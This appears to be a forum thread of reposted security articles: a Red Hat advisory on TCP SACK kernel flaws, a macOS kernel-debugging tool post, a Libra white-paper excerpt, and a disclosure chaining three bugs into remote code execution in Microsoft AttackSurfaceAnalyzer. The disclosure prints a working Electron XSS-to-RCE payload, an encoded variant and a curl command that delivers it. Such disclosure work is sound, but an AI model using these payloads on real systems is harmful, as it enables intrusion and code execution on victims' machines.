echo " [✗]" echo "[*] System is NOT vulnerable :( [✗]" fi; tput cnorm Sursa: https://www.exploit-db.com/exploits/46989?utm_source=dlvr.it&utm_medium=twitter
  3. Facebook CTF 2019 Challenges This repository contains the challenge source code and solutions for Facebook CTF 2019. Sursa: https://github.com/fbsamples/fbctf-2019-challenges
  4. Executive Summary Three related flaws were found in the Linux kernel’s handling of TCP networking. The most severe vulnerability could allow a remote attacker to trigger a kernel panic in systems running the affected software and, as a result, impact the system’s availability. The issues have been assigned multiple CVEs: CVE-2019-11477 is considered an Important severity, whereas CVE-2019-11478 and CVE-2019-11479 are considered a Moderate severity. The first two are related to the Selective Acknowledgement (SACK) packets combined with Maximum Segment Size (MSS), the third solely with the Maximum Segment Size (MSS). These issues are corrected either through applying mitigations or kernel patches. Mitigation details and links to RHSA advsories can be found on the RESOLVE tab of this article. Issue Details and Background Three related flaws were found in the Linux kernel’s handling of TCP Selective Acknowledgement (SACK) packets handling with low MSS size. The extent of impact is understood to be limited to denial of service at this time. No privilege escalation or information leak is currently suspected. While mitigations shown in this article are available, they might affect traffic from legitimate sources that require the lower MSS values to transmit correctly and system performance. Please evaluate the mitigation that is appropriate for the system’s environment before applying. What is a selective acknowledgement ? TCP Selective Acknowledgment (SACK) is a mechanism where the data receiver can inform the sender about all the segments that have successfully been accepted. This allows the sender to retransmit segments of the stream that are missing from its ‘known good’ set. When TCP SACK is disabled a much larger set of retransmits are required to retransmit a complete stream. What is MSS The maximum segment size (MSS) is a parameter set in the TCP header of a packet that specifies the total amount of data contained in a reconstructed TCP segment. As packets might become fragmented when transmitting across different routes, a host must specify the MSS as equal to the largest IP datagram payload size that a host can handle. Very large MSS sizes might mean that a stream of packets ends up fragmented on their way to the destination, whereas smaller packets can ensure less fragmentation but end up with unused overhead. Operating systems and transport types can default to specified MSS sizes. Attackers with privileged access can create raw packets with crafted MSS options in the packet to create this attack. TCP SACKs: TCP is a connection oriented protocol. When two parties wish to communicate over a TCP connection, they establish a connection by exchanging certain information such as requesting to initiate (SYN) a connection, initial sequence number, acknowledgement number, maximum segment size (MSS) to use over this connection, permission to send and process Selective Acknowledgements(SACKs), etc. This connection establishment process is known as 3-way handshake. TCP sends and receives user data by a unit called Segment. A TCP segment consists of TCP Header, Options and user data. Each TCP segment has a Sequence Number (SEQ) and Acknowledgement Number (ACK). These SEQ & ACK numbers are used to track which segments are successfully received by the receiver. ACK number indicates the next expected segment by the receiver. Example: user ‘A’ above sends 1 kilobytes of data through 13 segments of 100 bytes each, 13 because each segment has TCP header of 20 bytes. On the receiving end, user ‘B’ receives segments 1, 2, 4, 6, 8 - 13, segments 3, 5 and 7 are lost, not received by user ‘B’. By using ACK numbers, user ‘B’ will indicate that it is expecting segment number 3, which the user ‘A’ reads as none of the segments after 2 were received by the user ‘B’,and user ‘A’ will retransmit all the segments from 3 onwards, even though segments 4, 6 and 8-13 were successfully received by user ‘B’. User ‘B’ has no way to indicate that to user ‘A’. This leads to an inefficient usage of the network. Selective Acknowledgement: SACK To overcome above problem, Selective Acknowledgement(SACK) mechanism was devised and defined by RFC-2018. With Selective Acknowledgement(SACK), user ‘B’ above uses its TCP options field to inform user ‘A’ about all the segments(1,2,4,6,8-13) it has received successfully, so user ‘A’ needs to retransmit only segments 3, 5, and 7, thus considerably saving the network bandwidth and avoiding further congestion. CVE-2019-11477 SACK Panic: Socket Buffers(SKB😞 Socket Buffer (SKB) is the most central data structure used in the Linux TCP/IP implementation. It is a linked list of buffers, which holds network packets. Such list can act as a Transmission queue, Receive queue, SACK’d queue, Retransmission queue, etc. SKB can hold packet data into fragments. Linux SKB can hold up to 17 fragments. linux/include/linux/skbuff.h define MAX_SKB_FRAGS (65536/PAGE_SIZE + 1) => 17 With each fragment holding up to 32KB on x86 (64KB on PowerPC) of data. When packet is due to be sent, it’s placed on the Send queue and it’s details are kept in a control buffer structure like linux/include/linux/skbuff.h struct tcp_skb_cb { __u32 seq; /* Starting sequence number */ __u32 end_seq; /* SEQ + FIN + SYN + datalen */ __u32 tcp_tw_isn; struct { u16 tcp_gso_segs; u16 tcp_gso_size; }; __u8 tcp_flags; /2* TCP header flags. (tcp[13]) */ … } Of these, ‘tcp_gso_segs’ and ‘tcp_gso_size’ fields are used to tell device driver about segmentation offload. When Segmentation offload is on and SACK mechanism is also enabled, due to packet loss and selective retransmission of some packets, SKB could end up holding multiple packets, counted by ‘tcp_gso_segs’. Multiple such SKB in the list are merged together into one to efficiently process different SACK blocks. It involves moving data from one SKB to another in the list. During this movement of data, the SKB structure can reach its maximum limit of 17 fragments and ‘tcp_gso_segs’ parameter can overflow and hit the BUG_ON() call below resulting in the said kernel panic issue. static bool tcp_shifted_skb (struct sock *sk, …, unsigned int pcount, ...) { ... tcp_skb_pcount_add(prev, pcount); BUG_ON(tcp_skb_pcount(skb) < pcount); <= SACK panic tcp_skb_pcount_add(skb, -pcount); … } A remote user can trigger this issue by setting the Maximum Segment Size(MSS) of a TCP connection to its lowest limit of 48 bytes and sending a sequence of specially crafted SACK packets. Lowest MSS leaves merely 8 bytes of data per segment, thus increasing the number of TCP segments required to send all data. Acknowledgements Jonathan Looney (Netflix Information Security) References RFC-2018 - TCP selective acknowledgments How SKB’s work Netflix (reporters) original report. Sursa: https://access.redhat.com/security/vulnerabilities/tcpsack
      • 1
      • Upvote
  5. LLDBagility: practical macOS kernel debugging Date Tue 18 June 2019 By Francesco Cagnin Category macOS. Tags macOS XNU kernel hypervisor debugging FDP LLDBagility This is the second of two blog posts about macOS kernel debugging. In the previous post, we defined most of the terminology used in both articles, described how kernel debugging is implemented for the macOS kernel and discussed the limitations of the available tools; here, we present LLDBagility, our solution for an easier and more functional macOS debugging experience. As the reader may have concluded after reading the previous blog post [1], in the current state of things debugging the macOS kernel (XNU) is not very practical, especially considering inconveniences like having to install debug kernel builds and the impossibility to set watchpoints or pause the execution of the kernel from the debugger. To improve the situation, we developed LLDBagility [2], a tool for debugging macOS virtual machines with the aid of the Fast Debugging Protocol (FDP, described later in the article). Above all else, LLDBagility implements a set of new LLDB commands that allow the debugger to: attach to running macOS VirtualBox virtual machines and debug their kernel, stealthily, without the need of changing the guest OS (e.g. no necessity of DEVELOPMENT or DEBUG kernels, boot-args modification or SIP disabling) and with minimal changes to the configuration of the VM [3]; interrupt (and later resume) the execution of the guest kernel at any moment; set hardware breakpoints anywhere in kernel code, even at the start of the boot process; set hardware watchpoints that trigger on read and/or write accesses of the specified memory locations; save and restore the state of the VM in a few seconds. These commands are intended to be used alongside the ones already available in LLDB, like memory/register read/write, breakpoint (software), step and so on. Moreover, in case the debugged kernel comes with its Kernel Debug Kit (and possibly even when it doesn't, as discussed later), the vast majority of lldbmacros work as expected. In the next sections, we first briefly describe what FDP is and how it enhances VirtualBox to enable virtual machine introspection; then, we examine how LLDBagility takes advantage of these new capabilities to connect transparently LLDB to macOS virtual machines, and demonstrate a simple kernel debugging session; finally, we present some ideas for using existing lldbmacros with kernel builds lacking a debug kit. Virtual machine introspection via the Fast Debugging Protocol The Fast Debugging Protocol [4] is a light, fast and efficient debugging API for stealthy introspection of virtual machines, written in C and currently only released as a patch to VirtualBox's source code [FDP]. This API makes it possible to: read and write VMs registers and memory; set and unset hardware/software breakpoints and watchpoints; pause, resume and single-step the execution of the virtual machines; save and restore the VMs state. FDP's stealthiness comes from the manipulation of the Extended Page Tables of the virtual machines (operation that can be very difficult to detect from the guests), while speed is the result of using shared memory between FDP and the VMs (reaching in some cases one million of memory reads per second). In addition to the low-level C interface, the API also provides Python bindings (PyFDP) that can be useful both for quick proof of concepts and for bigger projects like LLDBagility; as an example, here is a script that breaks on every system call: #!/usr/bin/env python2 from PyFDP.FDP import FDP # Open the debuggee VM by its name fdp = FDP("18E226") # Pause the VM to install a breakpoint fdp.Pause() # Install a hardware breakpoint (very fast and stealth) UnixSyscall64 = 0xffffff80115bae84 fdp.dr0 = UnixSyscall64 fdp.dr7 = 0x403 # Resume the execution after the breakpoint installation fdp.Resume() while True: # Wait for a breakpoint hit fdp.WaitForStateChanged() print "%x" % (fdp.rax) # Jump over the breakpoint fdp.SingleStep() # Resume the debuggee fdp.Resume() More details about FDP can be found in the original article on Winbagility [4] (in French) [WinbagilitySSTIC2016], LLDBagility's older counterpart for Windows and WinDbg. Attaching LLDB to virtual machines As presented at length in the previous post, during regular two-machine debugging, LLDB interacts with the macOS kernel of the debuggee by sending commands to its internal KDP stub, which, being itself part of the kernel, is then able to inspect and alter the state of the machine as requested and communicate back the results. The key idea behind LLDBagility is to replicate the functionalities provided by such agent using the analogous capabilities of (virtual) machine introspection and modification offered by FDP at the hypervisor level, so that the kernel's debugging stub can be replaced by an equivalent alternative external to the debugged machine. In addition, by maintaining compatibility with the KDP protocol, this new stub can take advantage of LLDB's existing support for the macOS kernel without modifying the debugger in any aspect, since there's no difference in communications with respect to the KDP server in the kernel. In this regard, Ian Beer used an analogous solution for his iOS kernel debugger [5]. This approach brings in two notable advantages: the elimination of the necessity of enabling KDP in the kernel for debugging, and the possibility of augmenting LLDBagility's stub with additional features: all the limitations of the classic debugging method described in the first blog post can now be overcome. First of all, since setting up XNU for debugging is not required anymore, it becomes unnecessary to modify the NVRAM and possibly disabling SIP; likewise, there is also no need to install DEBUG or DEVELOPMENT builds. Secondly, all system-wide side effects related to KDP code disappear, implying for example a more difficult debugger detection by rootkits. Thirdly, debugging can now start before the initialisation of the KDP stub during the kernel boot process. Finally, having complete control over the machine thanks to FDP makes it easy to implement hardware breakpoints, watchpoints and a mechanism for pausing the kernel at debugger's command. Overview of the tool As mentioned in the introduction, LLDBagility's front end is a set of new LLDB commands, implemented in lldbagility.py (from [LLDBagility100]😞 fdp-attach or simply fa, to connect the debugger to a running macOS VirtualBox virtual machine; fdp-hbreakpoint or fh, to set and unset read/write/execute hardware breakpoints; fdp-interrupt or fi, to pause the execution of the VM and return the control to the debugger (equivalent to the known sudo dtrace -w -n "BEGIN { breakpoint(); }"); fdp-save or fs, to save the current state of the VM; fdp-restore or fr, to restore the VM to the last saved state. On the other hand, the back end is composed of: kdpserver.py, the new KDP server (replacement of XNU's) to which LLDB is connected, whose job is to translate the KDP requests received by the debugger into commands for the VM and send back responses and exception notifications (e.g. breakpoint hits); stubvm.py, for abstracting common VM operations and actualising them with FDP. The connection between LLDB and the virtual machine to debug is established on fdp-attach. When the user executes this command, LLDBagility: instantiates a PyFDP client for interacting with the VM (lldbagility.py#L73); starts its own KDP server on a secondary thread (lldbagility.py#L93), waiting for requests (kdpserver.py#L182); executes the LLDB command kdp-remote to connect the debugger to the KDP server that has just started (lldbagility.py#L99, procedure explained in detail in the first blog post), kicking off the debugging process. As a last interesting note, the translation of KDP requests into corresponding FDP commands is not sufficient to have lldbmacros working correctly. In fact, such macros rely on the ability to use some fields of the kdp struct (osfmk/kdp/kdp_internal.h#L41/#L55, tools/lldbmacros/core/operating_system.py#L777 both from [XNU49032212]), populated by the kernel only when its KDP stub is enabled (e.g. osfmk/kdp/kdp_udp.c#L1349). LLDBagility obviates the problem by hooking memory reads from the debugger to the kdp struct and returning a patched memory chunk in which necessary fields (e.g. kdp_thread) are filled with proper values (stubvm.py#L242). Demo The following video demonstrates a quick debugging session with LLDBagility: In summary: LLDB is started and fdp-attach'ed to the virtual machine named "18E226" running in background; the lldbmacros (automatically loaded from .lldbinit) showcurrentthreads and showrights are executed; the execution of the VM is resumed with the continue command and then quickly interrupted with fdp-interrupt; the state of the VM is first saved with fdp-save, then modified by simply resuming the machine execution, and finally restored with fdp-restore; a read and write watchpoint is set with fdp-hbreakpoint on &(*(boot_args*)PE_state.bootArgs).flags, which triggers immediately thereafter inside csr_check(). Reusing debug information between kernels In this last section we explore some ideas about debugging kernels with lldbmacros coming from a Kernel Debug Kit released for a different kernel build. The methods proposed here have their obvious limitations, but they also have been proven to work sufficiently well and are worth a shot; see KDKutils/ for code and examples. As mentioned in the first post, the absence of KDKs for most kernel builds makes debugging more difficult, since in such cases types information and lldbmacros are not available. Luckily, the debug information required by these macros to work correctly comprises a relatively small number of global variables and structs, like version (config/version.c#L40) and kdp, whose definitions do not change much (or at all) from one kernel version to the next. In this light, it seems reasonable to try to reuse debug information from available KDKs so that most features of existing lldbmacros can be used with kernels lacking their own debug kit. As an example, let us assume we have debug information (i.e. the DWARF file generated during compilation) and lldbmacros for kernel build A, but not for build B. With the goal of loading and using A's lldbmacros for debugging B in LLDB, it is possible to provide the debugger with a "fake" DWARF file for kernel B, created by patching A's in such a way that: its Mach-O UUID matches B's instead of A's, and the load addresses of all symbols used by the macros match the virtual load addresses of the same symbols in B's memory at run time. These two small changes should be enough to have most macros working. The simple approach just discussed works well when the symbols used by lldbmacros have very similar definitions in the code of the two kernels, which is naturally the case when they are successive releases. When this does not happen (for example when a field is added or removed from the thread struct), then the workaround above is no longer sufficient, since it becomes necessary to also modify the DWARF file to alter types definitions; but this is not easy. For such cases, it is possible and better to create the fake DWARF from scratch, by first parsing a source DWARF file to extract types information about the structures used by lldbmacros, and then generating C source files containing the types definitions. These sources can easily be edited by hand to modify types as desired and then compiled so that a new DWARF file is created. Before loading it in LLDB, the DWARF file must be patched as above to change its UUID and load address to match the kernel being debugged. Wrapping up With this post, we presented LLDBagility, a convenient alternative to classic macOS kernel debugging based on virtual machine introspection. While not perfect (yet), our solution sets aside or greatly alleviates all current limitations of the standard approach, and at the same time offers powerful additional features that make debugging much more practical. LLDBagility has been actively used at Quarkslab in the past months and it is being released for others to experiment with; feedback via GitHub is welcome and encouraged. Happy debugging! References and footnotes [FDP] Source code of the Fast Debugging Protocol. Available at https://github.com/Winbagility/Winbagility/tree/fe1e38c2cbad6a1fb92dbad3440c6381768aa8cc/src/FDP/, https://github.com/Winbagility/Winbagility/tree/fe1e38c2cbad6a1fb92dbad3440c6381768aa8cc/src/VBoxPatch/ and https://github.com/Winbagility/Winbagility/tree/fe1e38c2cbad6a1fb92dbad3440c6381768aa8cc/bindings/python/ [WinbagilitySSTIC2016] Couffin, Nicolas. (2016). Débogage furtif et introspection de machine virtuelle. Available at https://www.sstic.org/media/SSTIC2016/SSTIC-actes/debogage_furtif_et_introspection_de_machines_virtu/SSTIC2016-Article-debogage_furtif_et_introspection_de_machines_virtuelles-couffin.pdf [LLDBagility100] Source code of LLDBagility 1.0.0. Available at https://github.com/quarkslab/LLDBagility/tree/v1.0.0/ [XNU49032212] Source code of XNU 4903.221.2 from macOS 10.14.1. Available at https://github.com/apple/darwin-xnu/tree/xnu-4903.221.2/ [1] https://blog.quarkslab.com/an-overview-of-macos-kernel-debugging.html [2] https://github.com/quarkslab/LLDBagility/ [3] As per current FDP limitations: the VM must use a single processor and no more than 2 GB of RAM. [4] (1, 2) https://winbagility.github.io/ [5] https://bugs.chromium.org/p/project-zero/issues/detail?id=1417#c16 Sursa: https://blog.quarkslab.com/lldbagility-practical-macos-kernel-debugging.html
  6. Libra’s mission is to enable a simple global currency and financial infrastructure that empowers billions of people. This document outlines our plans for a new decentralized blockchain, a low-volatility cryptocurrency, and a smart contract platform that together aim to create a new opportunity for responsible financial services innovation. Problem Statement The advent of the internet and mobile broadband has empowered billions of people globally to have access to the world's knowledge and information, high-fidelity communications, and a wide range of lower-cost, more convenient services. These services are now accessible using a $40 smartphone from almost anywhere in the world.1 This connectivity has driven economic empowerment by enabling more people to access the financial ecosystem. Working together, technology companies and financial institutions have also found solutions to help increase economic empowerment around the world. Despite this progress, large swaths of the world's population are still left behind — 1.7 billion adults globally remain outside of the financial system with no access to a traditional bank, even though one billion have a mobile phone and nearly half a billion have internet access.2 For too many, parts of the financial system look like telecommunication networks pre-internet. Twenty years ago, the average price to send a text message in Europe was 16 cents per message.3 Now everyone with a smartphone can communicate across the world for free with a basic data plan. Back then, telecommunications prices were high but uniform; whereas today, access to financial services is limited or restricted for those who need it most — those impacted by cost, reliability, and the ability to seamlessly send money. All over the world, people with less money pay more for financial services. Hard-earned income is eroded by fees, from remittances and wire costs to overdraft and ATM charges. Payday loans can charge annualized interest rates of 400 percent or more, and finance charges can be as high as $30 just to borrow $100.4 When people are asked why they remain on the fringe of the existing financial system, those who remain “unbanked” point to not having sufficient funds, high and unpredictable fees, banks being too far away, and lacking the necessary documentation.5 Blockchains and cryptocurrencies have a number of unique properties that can potentially address some of the problems of accessibility and trustworthiness. These include distributed governance, which ensures that no single entity controls the network; open access, which allows anybody with an internet connection to participate; and security through cryptography, which protects the integrity of funds. But the existing blockchain systems have yet to reach mainstream adoption. Mass-market usage of existing blockchains and cryptocurrencies has been hindered by their volatility and lack of scalability, which have, so far, made them poor stores of value and mediums of exchange. Some projects have also aimed to disrupt the existing system and bypass regulation as opposed to innovating on compliance and regulatory fronts to improve the effectiveness of anti-money laundering. We believe that collaborating and innovating with the financial sector, including regulators and experts across a variety of industries, is the only way to ensure that a sustainable, secure and trusted framework underpins this new system. And this approach can deliver a giant leap forward toward a lower-cost, more accessible, more connected global financial system. Sursa: https://libra.org/en-US/white-paper/#introduction
  7. Chaining Three Bugs to Get RCE in Microsoft AttackSurfaceAnalyzer Background What is AttackSurfaceAnalyzer (ASA)? Electron, Electron EveryWhere! Running ASA Vuln 1: Listening on All Interfaces Kestrel's Host Filtering Vuln2: Cross-Site Scripting XSS Root Cause Analysis XSS in Guest from Remote Payloads Vuln 3: XSS to RCE via NodeIntegration The RCE Payload Funky Gifs The Good and the Bad How Can We Fix This? Fixes Timeline This is a blog post about how I found three vulns and chained them to get RCE in the Microsoft AttackSurfaceAnalyzer (ASA moving forward) GUI version. ASA uses Electron.NET which binds the internal Kestrel web server to 0.0.0.0. If permission is given to bypass the Windows OS firewall (or if used on an OS without one), a remote attacker can connect to it and access the application. The web application is vulnerable to Cross-Site Scripting (XSS). A remote attacker can submit a runID with embedded JavaScript that is executed by the victim using the ASA Electron application. Electron.NET does not have the NodeIntegration flag set to false. This allows the JavaScript payload to spawn up processes on the victim's machine. Background Around a month ago someone posted a link to the new version of the tool from Microsoft. Matt who is my ultimate boss said: Wrote the first version of that with John Lambert over a holiday break... I had never seen the tool before but I had used an internal tool which basically did the same thing and more. What is AttackSurfaceAnalyzer (ASA)? According to Microsoft Attack Surface Analyzer takes a snapshot of your system state before and after the installation of other software product(s) and displays changes to a number of key elements of the system attack surface. You run it before you install an application/service and then after. Finally, you can compare these two runs to see what the application has installed on the machine. ASA is typically run as root/admin. Because the application needs as much access as possible to document and monitor changes to the machine. Electron, Electron EveryWhere! The new version of the application is based on Electron. Electron is a framework for packaging webapps as desktop applications. Think of it as a Chromium instance opening your webapp running locally. To learn more about Electron, please read any of the many tutorials. Electron apps are very popular. I am writing this text in VS Code which is another Electron app. ASA uses Electron.NET which "is a wrapper around a "normal" Electron application with an embedded ASP.NET Core application." I am not very familiar with the inner-workings of either framework but it looks like it runs a local Kestrel web server and then opens an ASP.NET web application via Electron. Running ASA I downloaded ASA v2.0.143 and started it in a Windows VM from modern.ie. ASA should be run as admin to get the most visibility into the system/application. After running ASA in an admin prompt. I saw the Windows Firewall alert. First Run This was strange. Why would a local Electron app need to open Firewall ports? Looking at the command prompt, I saw the culprit. C:\Users\IEUser\Downloads\AsaGui-windows-2.0.141> Electron Socket IO Port: 8000 Electron Socket started on port 8000 at 127.0.0.1 ASP.NET Core Port: 8001 stdout: Use Electron Port: 8000 stdout: Hosting environment: Production Content root path: C:\Users\IEUser\Downloads\AsaGui-windows-2.0.141\resources\app\bin\ Now listening on: http://0.0.0.0:8001 Application started. Press Ctrl+C to shut down. The Kestrel web server is listening on all interfaces on port 8001. The port is not static, we can see in the application's source code that it starts from port 8000 and uses the first two available ports. The first is used by Electron and the second by the Kestrel web server. In a typical scenario, the ports will be 8000 and 8001. Electron.NET/ElectronNET.Host/main.js#L141 title 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 function startAspCoreBackend(electronPort) { // hostname needs to be localhost, otherwise Windows Firewall will be triggered. portscanner.findAPortNotInUse(8000, 65535, 'localhost', function (error, electronWebPort) { console.log('ASP.NET Core Port: ' + electronWebPort); loadURL = `http://localhost:${electronWebPort}`; const parameters = [`/electronPort=${electronPort}`, `/electronWebPort=${electronWebPort}`]; let binaryFile = manifestJsonFile.executable; const os = require('os'); if (os.platform() === 'win32') { binaryFile = binaryFile + '.exe'; } let binFilePath = path.join(currentBinPath, binaryFile); var options = { cwd: currentBinPath }; // Run the binary with params and options. apiProcess = process(binFilePath, parameters, options); apiProcess.stdout.on('data', (data) => { console.log(`stdout: ${data.toString()}`); }); }); } These ports are passed to the binary as command line parameters. The binary file is located at AsaGui-windows-2.0.141/resources/app/bin/electron.manifest.json in a key named executable: { "executable": "AttackSurfaceAnalyzer-GUI" } Using procmon (use the filter Process Name is AttackSurfaceAnalyzer-GUI or use Tools > Process Tree) we can see the parameters in action. AttackSurfaceAnalyzer-GUI.exe /electronPort=8000 /electronWebPort=8001 Command line parameters We can manually go to localhost:8001 to see the application in the browser and interact with it. ASA in browser Vuln 1: Listening on All Interfaces The Kestrel web server listening on all interfaces. If it gets permission to open ports or if you do not have a firewall (disable on Windows or running on an OS without one), anyone can connect to it from outside. I created a host-only network interface between the guest VM and the host. After navigating to the guest IP in the host's browser at 192.168.56.101:8001, I got the following error: HTTP Error 400. The request hostname is invalid. Hostname is invalid Or in Burp: HTTP/1.1 400 Bad Request Connection: close Date: Tue, 21 May 2019 20:14:36 GMT Content-Type: text/html Server: Kestrel Content-Length: 334 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>Bad Request</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></ HEAD > <BODY><h2>Bad Request - Invalid Hostname</h2> <hr><p>HTTP Error 400. The request hostname is invalid.</p> </BODY></HTML> Note the Server: Kestrel response header which is not really secret information. Kestrel's Host Filtering Kestrel has a host filtering middleware. Read more about it at: Kestrel web server implementation in ASP.NET Core - Host Filtering It filters incoming requests by the Host header. We can use a simple Proxy > Options > Match and Replace rule in Burp to convert our requests' Host header from 192.168.56.101:8001 to localhost:8001 and access the web application remotely. Bypass Host Filtering This setting is enabled inside AsaGui-windows-2.0.141/resources/app/bin/appsettings.json via AllowedHosts: { "Logging": { "LogLevel": { "Default": "Warning" } }, "AllowedHosts": "localhost", "ApplicationInsights": { "InstrumentationKey": "79fc14e7-936c-4dcf-ba66-9a4da6e341ef" } } Vuln2: Cross-Site Scripting The application does not have a lot of injection points. User input is very limited. We can submit scans and then analyze them. We can export the results in specific paths and create reports. The Run Id is pretty much the only place with user input. Let's try a basic injection script and submit a run. When submitting a run, select something simple like Certificates for quick runs. Note: Run Ids are stored in a SQLite database and must be unique per app. XSS in Browser Oops! XSS Root Cause Analysis This is the request to submit our previous run. http://192.168.56.101:8001/Home/StartCollection?Id=<script>alert(1)</script>& File=false&Port=false&Service=false&User=false&Registry=false&Certificates=true The application then calls GetCollectors to get information about the current run and display progress. http://192.168.56.101:8001/Home/GetCollectors The response to the app is a string containing a JSON object. The beautified version of our test run is: { "RunId": "<script>alert(1)</script>", "Runs": { "CertificateCollector": 3 } } The value of RunId is injected directly into the web page. The culprit is at js/Collect.js:174: GetCollectors() 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 function GetCollectors() { $.getJSON('GetCollectors', function (result) { var data = JSON.parse(result); var rundata = data.Runs; var keepChecking = false; var anyCollectors = false; var icon, midword; $('#ScanStatus').empty(); if (Object.keys(rundata).length > 0) { // INJECTION $('#ScanStatus').append($('<div/>', { html: l("%StatusReportFor") + data.RunId + ".</i>" })); } // Removed }); } There's no input validation or output encoding for data.RunId. Interestingly, the IDs appear output encoded in the Result tab. Not being Lewis Ardern (solid 5/7 JavaScript guy), I am glad this simple payload worked. XSS in Guest from Remote Payloads We have this reflected XSS which is pretty much worthless. Ok, not completely worthless. If an attacker can make you click on a link to localhost:8001 and submit a payload, they can get XSS in your ASA/browser inside the VM. Not really that useful. But it gets better because the XSS persists in the guest VM running the ASA Electron app. Without submitting a new run, navigate to the Scan tab (or click on it again) in ASA's Electron app inside the guest VM and you should see the alert. When you navigate to the Scan tab, the application retrieves the information for the latest submitted run (the one we submitted from host VM) and the injected payload is executed. This means an attacker can connect to the app via port 8001, submit XSS and then it will pop in ASA when we use it locally. Vuln 3: XSS to RCE via NodeIntegration Being Electron, I immediately thought of RCE. There are a lot of write-ups about how you can convert an XSS to RCE in Electron. It's easy when NodeIntegration is enabled which is the case for Electron.NET (link to the current commit😞 WebPreferences.cs 1 2 3 4 5 /// <summary> /// Whether node integration is enabled. Default is true. /// </summary> [DefaultValue(true)] public bool NodeIntegration { get; set; } = true; More info: Electron Security - Do not enable Node.js Integration for Remote Content This means we can use the XSS to spawn processes in the guest VM running ASA. Note that there are NodeIntegration bypasses so just disabling it might not be enough. The RCE Payload It's the typical Electron XSS to RCE payload. Google one and use it. XSS to RCE Payload 1 2 3 4 5 6 7 8 9 var Process = process.binding('process_wrap').Process; var proc = new Process(); proc.onexit = function(a,b) {}; var env = process.env; var env_ = []; for (var key in env) env_.push(key+'='+env[key]); proc.spawn({file:'calc.exe',args:[],cwd:null,windowsVerbatimArguments:false, detached:false,envPairs:env_,stdio:[{type:'ignore'},{type:'ignore'}, {type:'ignore'}]}); Use the JavaScript eval String.fromCharCode encoder to convert it to the following. Then submit a new run with the payload as the Run Id from the browser in the host machine (note that I have added a bogus id element to make each payload unique): <img id="5" src=x onerror=eval(String.fromCharCode(118,97,114,32,80,114,111,99, 101,115,115,32,61,32,112,114,111,99,101,115,115,46,98,105,110,100,105,110,103, 40,39,112,114,111,99,101,115,115,95,119,114,97,112,39,41,46,80,114,111,99,101, 115,115,59,10,118,97,114,32,112,114,111,99,32,61,32,110,101,119,32,80,114,111, 99,101,115,115,40,41,59,10,112,114,111,99,46,111,110,101,120,105,116,32,61,32, 102,117,110,99,116,105,111,110,40,97,44,98,41,32,123,125,59,10,118,97,114,32, 101,110,118,32,61,32,112,114,111,99,101,115,115,46,101,110,118,59,10,118,97,114, 32,101,110,118,95,32,61,32,91,93,59,10,102,111,114,32,40,118,97,114,32,107,101, 121,32,105,110,32,101,110,118,41,32,101,110,118,95,46,112,117,115,104,40,107, 101,121,43,39,61,39,43,101,110,118,91,107,101,121,93,41,59,10,112,114,111,99,46, 115,112,97,119,110,40,123,102,105,108,101,58,39,99,97,108,99,46,101,120,101,39, 44,97,114,103,115,58,91,93,44,99,119,100,58,110,117,108,108,44,119,105,110,100, 111,119,115,86,101,114,98,97,116,105,109,65,114,103,117,109,101,110,116,115,58, 102,97,108,115,101,44,100,101,116,97,99,104,101,100,58,102,97,108,115,101,44, 101,110,118,80,97,105,114,115,58,101,110,118,95,44,115,116,100,105,111,58,91, 123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101, 58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110, 111,114,101,39,125,93,125,41,59))> You can also submit the payload locally via this curl command: curl -vvv -ik -H "Host:localhost:8001" "http://localhost:8001/Home/StartCollection? Id=<img%20id=%225%22%20src=x%20onerror=eval(String.fromCharCode(118,97,114,32,80, 114,111,99,101,115,115,32,61,32,112,114,111,99,101,115,115,46,98,105,110,100,105, 110,103,40,39,112,114,111,99,101,115,115,95,119,114,97,112,39,41,46,80,114,111,99, 101,115,115,59,10,118,97,114,32,112,114,111,99,32,61,32,110,101,119,32,80,114,111, 99,101,115,115,40,41,59,10,112,114,111,99,46,111,110,101,120,105,116,32,61,32,102, 117,110,99,116,105,111,110,40,97,44,98,41,32,123,125,59,10,118,97,114,32,101,110, 118,32,61,32,112,114,111,99,101,115,115,46,101,110,118,59,10,118,97,114,32,101, 110,118,95,32,61,32,91,93,59,10,102,111,114,32,40,118,97,114,32,107,101,121,32, 105,110,32,101,110,118,41,32,101,110,118,95,46,112,117,115,104,40,107,101,121,43, 39,61,39,43,101,110,118,91,107,101,121,93,41,59,10,112,114,111,99,46,115,112,97, 119,110,40,123,102,105,108,101,58,39,99,97,108,99,46,101,120,101,39,44,97,114,103, 115,58,91,93,44,99,119,100,58,110,117,108,108,44,119,105,110,100,111,119,115,86, 101,114,98,97,116,105,109,65,114,103,117,109,101,110,116,115,58,102,97,108,115, 101,44,100,101,116,97,99,104,101,100,58,102,97,108,115,101,44,101,110,118,80,97, 105,114,115,58,101,110,118,95,44,115,116,100,105,111,58,91,123,116,121,112,101, 58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111, 114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,93,125, 41,59))>&File=false&Port=false&Service=false&User=false&Registry=false&Certificates=true" Switch back to the Scan tab (or click on it to reload it if it's already open) in the guest VM and see calc pop up. Calc in guest VM Incidentally, the command line value in procmon for running the calc looks like a kaomoji. Calc in procmon Funky Gifs Injecting the payload from VM host: Injecting from host into guest Injecting the payload locally: Localhost and curl The Good and the Bad [+] ASA is usually run as Admin. This allows ASA to have more visibility into the OS and give us better results. This means our RCE is as admin. [+] The ports are usually 8000 and 8001. Unless you are running something else on those ports, it's easy to discover machines running a vulnerable version of the ASA. [-] ASA is usually run in disposable VMs. You are not going to fingerprint your applications on a prod VM. But these VMs are still connected to something. How Can We Fix This? Don't bind the web server to all interfaces. Output encode Run Ids in the progress page. Enable NodeIntegration and other Electron Defenses in Electron.NET. See Security, Native Capabilities, and Your Responsibility The issue was reported to Microsoft Security Response Center on May 22nd 2019. Fixes NodeIntegration disabled and ContextIsolation enabled: #218 Not listening on all interfaces - in Gui/Properties/launchSettings.json: #220 encodeURIComponent the runId - in Gui/wwwroot/js/Collect.js: #220 Timeline What Happened When Report 22 May 2019 Acknowledgement 22 May 2019 